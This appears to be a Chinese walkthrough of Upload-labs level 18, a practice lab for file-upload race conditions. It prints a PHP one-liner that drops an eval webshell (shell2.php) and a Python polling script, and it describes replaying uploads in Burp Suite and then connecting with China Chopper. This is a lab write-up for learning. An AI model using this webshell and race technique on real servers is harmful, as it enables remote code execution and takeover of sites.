访问目标站点,提示如下图所示

Upload-labs 18 条件竞争——通关_7z


查看源码

Upload-labs 18 条件竞争——通关_php_02


思路:上传shell.php.7z图片木马配合解析漏洞进行getshell

实验步骤:

图片中php一句话木马代码:​​<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>');?>​

第一种:使用python脚本

第一步:burpsuite抓包,上传文件名字shell.php.7z,在图片信息最下方是一句话木马:

<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>');?>

(只要被成功当作PHP文件解析,就会生成shell2.php 文件)

Upload-labs 18 条件竞争——通关_7z_03


第二步:python脚本打开并运行

python内容:

import requests
url = "http://127.0.0.1/upload-labs/upload/shell.php.7z"
while True:
html = requests.get(url)
if html.status_code == 200:
print("OK")
break
else:
print("NO")

Upload-labs 18 条件竞争——通关_php_04


第三步:在python脚本运行后,burpsuite开始无限制重放数据包

Upload-labs 18 条件竞争——通关_python脚本_05


直到python脚本出现OK,才关闭burpsuite

Upload-labs 18 条件竞争——通关_python脚本_06


第四步:访问生成的shell2.php文件

Upload-labs 18 条件竞争——通关_7z_07


中国菜刀连接即可

Upload-labs 18 条件竞争——通关_python脚本_08


Upload-labs 18 条件竞争——通关_python脚本_09


第二种:不使用python脚本

burpsuite与第一种方法一样,无限重放数据包,在无限重放数据包的同时,要一直访问shell.php.7z文件

Upload-labs 18 条件竞争——通关_7z_10


直到出现如下界面,说明竞争成功,成功执行shell.php.7z生成shell2.php 文件

Upload-labs 18 条件竞争——通关_7z_11


中国菜刀连接即可